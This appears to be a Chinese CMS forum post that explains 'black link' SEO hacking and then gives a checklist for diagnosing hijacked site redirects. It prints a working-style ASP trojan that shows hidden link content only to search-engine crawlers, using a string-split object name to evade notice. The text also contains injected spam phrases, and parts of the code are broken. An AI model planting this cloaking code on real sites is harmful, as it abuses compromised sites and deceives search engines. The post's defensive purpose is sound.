| (一)关于揭晓黑连的手段 
 黑链是SEO手法中相当普遍的一种手段,笼统地说,它就是指一些人用非正常的手段获取的其它网站的反向链接,最常见的黑链就是通过各种网站程序漏洞获取搜索引擎权重或者PR较高的网站的WEBSHELL,进而在被黑网站上链接自己的网站。
 黑客们做黑链的方式可能多种多样,但手段其实只有两种,一种是直接在目标网站上直接加上特定的链接代码,无锡住宿票另外一种只针对搜索引擎的访问来做,无锡住宿票让搜索引擎误认为目标站上存在着这样的链接。下面对这两种方法做一个详细的解释。
 1.直接在目标页面上加代码:这应该是最普通的一种手段,也是很容易发现的手段。以前的黑链大部分都是采用这种手段来进行。首先需要入侵目标站的FTP,然后针对网站所用的程序,在模板或者其他的页面加上“隐形”的链接。这种手段隐蔽性比较差,如果目标站的管理员懂得一定的SEO知识的话,很容易就会被发现。于是,更多的黑客开始使用第二个手段。
 2.通过一段判定的代码,判定来访者的名称和IP地址,如果来访者是蜘蛛,则将另外一段包涵链接的代码加入到目标页面中。下面以一个ASP的例子进行说明:
 黑客侵入到目标站的FTP,在程序里留下2个木马文件,一个文件名为int.asp,所包含的代码为:
 
 <%
 On Error Resume Next user_agent=Request.ServerVariables(“HTTP_USER_AGENT”) httpuser=LCase
 (request.servervariables(“http_user_agent”))
 if  instr(httpuser,”baidu”)>0 or instr(httpuser,”google”)>0 or instr(httpuser,”sogou”)>0 or instr(httpuser,”soso”)>0
 then Set ObjXMLHTTP=Server.createobject(“MSX”+”ML2.s”+”erv”+”erXML”+”HTTP”) ObjXMLHTTP.Open “GET”,” ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody
 Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject(“Adodb.Stream”) objStream.Type = 1
 objStream.Mode =3 objStream.Open objStream.Write
 GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = “gb2312″ GetHtml = objStream.ReadText objStream.Close key1=lcase(GetHtml) key1=Replace(key1&”",”-istxt-”,”")
 response.Write key1 end if
 %>
 
 通过IP和访问名称判定来访者是否为蜘蛛,将另外一个文件名字叫“193.txt”(主要是链接的代码)的文件写入到目标页面中。这样蜘蛛抓取的代码跟我们看到的代码是不一样的。不管是检查网页源文件还是用站长工具,都没办法发现黑链的存在。只有一种办法,那就是检查快照存档的代码页面,才能够看出问题来。
 第二种办法虽然复杂了点,无锡住宿票但是不容易被发现,无锡住宿票就算用这种方法让你的网站被K,你可能一时半刻都无法发现问题。实在属于杀手级别的黑链手段 .
 
 (二)网页突然无故跳转怎么处理?
 
 
 如果网站用特定渠道访问会无故跳转至其他的站点,比如从搜索链接进入、或者使用手机访问站点,会触发这个问题,不知道怎么解决。今天帮大家总结几个有效的解决方法。 ...
 
 
 PS:因为极个别用户以为这是我们在程序里面动了手脚,所以飞飞cms在此声明:
 本站出售的所有代码一律明文不加密,出现跳转的朋友可以自行查看下载的原始压缩包内的文件进行验证。
 而且从最直观的利益角度来说,我也没有必要靠动这种手脚来赚这么一点黑心钱,更没有必要为了这点蝇头小利毁掉自己的信誉,断掉自己将来继续营利的可能。没有这么蠢!
 
 好,下面进入正题。
 
 
 出现这种情况,没有例外,一定是自己的服务器或网站文件被动了手脚,可以从以下几方面进行排查。
 
 
 1,检查下是否使用了第三方的解析服务,或者第三方播放器包含广告。
 另外检查是否使用了51la等有广告的统计服务
 
 
 2、确认自己的域名是否被进行了DNS劫持。
 被DNS劫持的域名无论怎么访问都会直接跳转至其他的站点,此时可以直接使用IP进行访问,如果IP访问正常但域名访问一直跳转,那大概率可能自己的域名被劫持了,请联系DNS解析方面或者服务器方面的工作人员进行处理。
 
 
 3、确认自己的模板文件是不是被添加了跳转代码。
 此时可以在后台暂时更换成其他安全的模板,如果不再跳转,那就说明是模板文件里面被加了料。
 一般跳转代码会添加到JS文件中,尤其jquery库是被加料的重灾区,可以查看各js文件开头结尾是不是多出了一些加密代码,如果有,删掉后清理缓存再访问试试。
 或者直接把可疑的文件或完整模板包更换成下载模板压缩包里的原始文件。
 
 
 4、如果更换其他的模板仍然跳转,那就是cms程序或者运行环境被黑了。
 这种情况一般黑客会在运行环境里动手脚,比如apache和nginx被黑,自动在网页里面增加跳转代码,甚至可以控制频率,比如每天只加一次,而且只在手机版访问的时候出现,极其隐蔽,很难排查。
 
 
 遇到这种情况,可以重新安装cms程序或者在服务器管理面板(如宝塔)里面卸载并重装apache/nginx这些运行环境,即可解决问题。
 
 
 5、如果还是不行,那应该就是数据库或者服务器被黑了。
 直接联系服务器方的工作人员帮忙处理,普通人大概率是搞不定了。
 
 
 总之,整体思路就是定位问题具体出现的位置,然后针对性处理就可以了。
 修改或处理前一定要记得备份!
 平时也一定做好服务器的安全防护工作,以及定期备份网站和数据库,防患于未然。
 
 
 
 
 飞飞CMS官网提醒:请各位站长下载本站正版程序,其它地方所提供的程序下载均有可能带后门,木马及黑链等
 
 
                                                      飞飞cms官方论坛-www.feifeicms.vip | 
该贴共收到 14 条回复